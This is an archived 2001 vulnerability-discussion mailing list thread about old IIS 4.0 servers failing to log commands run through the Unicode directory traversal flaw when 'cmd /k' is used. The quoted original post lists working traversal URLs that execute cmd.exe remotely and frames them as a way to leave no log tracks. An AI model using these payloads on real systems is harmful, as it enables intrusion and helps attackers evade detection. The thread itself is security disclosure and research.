Vulnerability Development mailing list archives

RE: sometimes IIS 4.0 don't write logs.

From: Pablo Aravena <p.aravena () bysecure com>
Date: Thu, 20 Dec 2001 09:48:45 -0400

The problem looks like this:

        CMD /K [command]  Execute a command and "still active"
        CMD /C [command]  Execute a command and then finished.

        If you execute a cmd.exe?/k request this would be in active state
        until his finished this process instead of the cmd.exe?/c request
        that finishes the process inmediatly.  Because of this the IIS
that´s
        not log the process that has not come to an end.
                

Atentamente,
Pablo Aravena Martínez
Consultor de Seguridad
BYSECURE CSE S.A.
PGP FingerPrint: 4109 41C1 A295 75D8 F159  D542 96C5 5E6D 2B08 F28A
http://www.bysecure.com
mailto:p.aravena () bysecure com

-----Mensaje original-----
De:   ThEye [SMTP:theye () 350cc com]
Enviado el:   jueves, 20 de diciembre de 2001 0:39
Para: vuln-dev () securityfocus com
CC:   ndr113 () 350cc com
Asunto:       sometimes IIS 4.0 don't write logs.

<Hi:

I don't know if this problem is documented but i didn't find anything
about 
it anywhere.

The problem is the following one:

+ Problem:
When I was playing with "Microsoft IIS and PWS Extended Unicode Directory 
Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the
attacker 
uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c) 
,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability) 
sometimes don't write logs of the attacker's activity.

+ Implications:
If an attacker uses this vulnerability to crack a web page or anything, 
eventually no tracks will exist on the attacked server.

+ Final:
In PROBLEM I said "sometimes" because after a high number of requests to 
"cmd /k" , IIS 4.0 write logs of some requests, still I don't know when
and 
why IIS 4.0 write logs of the "cmd /k" request.
Anyone that can confirm or refute this please post it.


+ Exploit:
I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed

( without any patch ).

http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir

Result: No tracks on log files.

+ More Information:
1) Microsoft IIS and PWS Extended Unicode Directory Transversal
 
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
2) Microsoft Patch prmcan4i
 
http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U
S/prmcan4i.exe

Roberto Alamos M. (theye () 350cc com)
www.350cc.com

Current thread:

sometimes IIS 4.0 don't write logs. ThEye (Dec 19)
- <Possible follow-ups>
- RE: sometimes IIS 4.0 don't write logs. Pablo Aravena (Dec 20)
  - RE: sometimes IIS 4.0 don't write logs. ThEye (Dec 20)